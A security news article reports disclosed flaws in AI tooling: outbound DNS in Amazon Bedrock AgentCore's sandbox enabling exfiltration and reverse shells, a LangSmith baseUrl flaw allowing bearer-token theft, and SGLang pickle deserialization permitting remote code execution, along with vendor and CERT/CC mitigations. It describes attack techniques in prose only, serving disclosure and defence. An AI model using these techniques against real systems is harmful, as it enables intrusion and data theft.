Critical AI Vulnerabilities in Amazon Bedrock, LangSmith and SGLang Enable Data Exfiltration and RCE

Cybersecurity firms warn that multiple AI tooling flaws could let attackers steal data and run code remotely. BeyondTrust researchers found that Amazon Bedrock AgentCore Code Interpreter’s sandbox mode permits outbound DNS queries, a behavior that can be abused to create command-and-control channels and exfiltrate sensitive information via DNS, the company said.

BeyondTrust assigned the issue a CVSS score of 7.5 and described how a malicious actor can use DNS queries and responses to build a bidirectional communication channel, obtain an interactive reverse shell, and pull data from AWS resources if the interpreter’s IAM role has broad permissions. Kinnaird McQuade, chief security architect at BeyondTrust, said attackers could bypass expected network isolation controls by abusing DNS resolution.

Amazon told customers that the DNS behavior is intended functionality and urged affected users to run AgentCore Code Interpreter instances in VPC mode rather than Sandbox mode for complete network isolation and to use DNS firewalls to filter outbound lookups. BeyondTrust said, “This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters.”

Jason Soroko, senior fellow at Sectigo, advised administrators to inventory AgentCore instances and migrate critical workloads to VPC mode. “Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution,” Soroko said, adding that teams must also audit IAM roles to enforce least privilege.

Separately, Miggo Security disclosed a high-severity flaw in LangSmith that could enable token theft and account takeover. Miggo reported CVE-2026-25750 with a CVSS score of 8.5, affecting cloud and self-hosted deployments. The issue stemmed from lack of validation on a baseUrl parameter, allowing attackers to craft links that steal signed-in users’ bearer tokens, user IDs, and workspace IDs.

Miggo researchers Liad Eliyahu and Eliana Vuijsje warned, “A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link.” LangSmith addressed the issue in version 0.12.71 released in December 2025, Miggo said.

Open-source SGLang also has critical weaknesses tied to unsafe pickle deserialization, Orca Security researcher Igor Stepansky reported. Stepansky disclosed three CVEs: CVE-2026-3059 and CVE-2026-3060, each scored 9.8, allow unauthenticated remote code execution when specific network-exposed modules are enabled because they deserialize untrusted data with pickle.loads(). CVE-2026-3989, scored 7.8, involves insecure pickle.load() use in a crash-replay utility.

“The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network,” Stepansky said.

In a coordinated advisory, the CERT Coordination Center said those SGLang components are exploitable if they are enabled and the attacker can reach the ZeroMQ broker port. CERT/CC recommended restricting network exposure of SGLang interfaces, implementing segmentation and access controls, and monitoring for unexpected inbound TCP connections and unusual child processes or file activity. CERT/CC noted there was no public evidence of exploitation in the wild but urged vigilance.

What to do now:follow vendor guidance, apply available patches, migrate critical AI code interpreters from Sandbox to VPC mode where recommended, deploy DNS filtering, and audit IAM roles and network exposure for AI tooling. The incidents show AI observability and execution platforms can become high-value targets when configuration mistakes or unsafe deserialization are present.

#AIsecurity #Vulnerabilities #DNSExfiltration #RCE #devsecops #cybersecurity #news